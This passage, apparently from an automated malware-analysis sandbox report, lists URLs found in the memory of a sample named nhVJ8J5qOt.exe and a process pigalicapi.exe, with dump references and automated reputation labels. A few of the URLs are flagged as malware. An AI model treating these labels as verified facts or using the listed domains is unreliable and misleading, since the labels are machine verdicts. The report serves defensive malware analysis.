nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://www.valselit.com/177-appartement-a-vendre-sigean-30378pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://www.olras.com/NnhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://www.ottospm.com/xmlrpc.php&&knhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        http://www.myropcb.com/why-use-myro/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pwd.org/mnhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://gholographic.com/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pr-park.com/D(onhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://www.ora-ito.com/nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.653416069.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.656622787.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://tickets.suresupport.com/faq/article-1596/ennhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.646765742.00000000012A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://www.lrsuk.com/nhVJ8J5qOt.exe, 00000000.00000002.832259405.0000000007680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298enhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://myropcb.com/login/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://www.com-sit.com/branchen-know-how/pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          http://www.c9dd.com/.0#nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2FnhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.speelhal.net/enhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.photo4b.com/$nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpgnhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.pr-park.com/dualnhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.jenco.co.uk/UnhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.14nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.13.4nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, 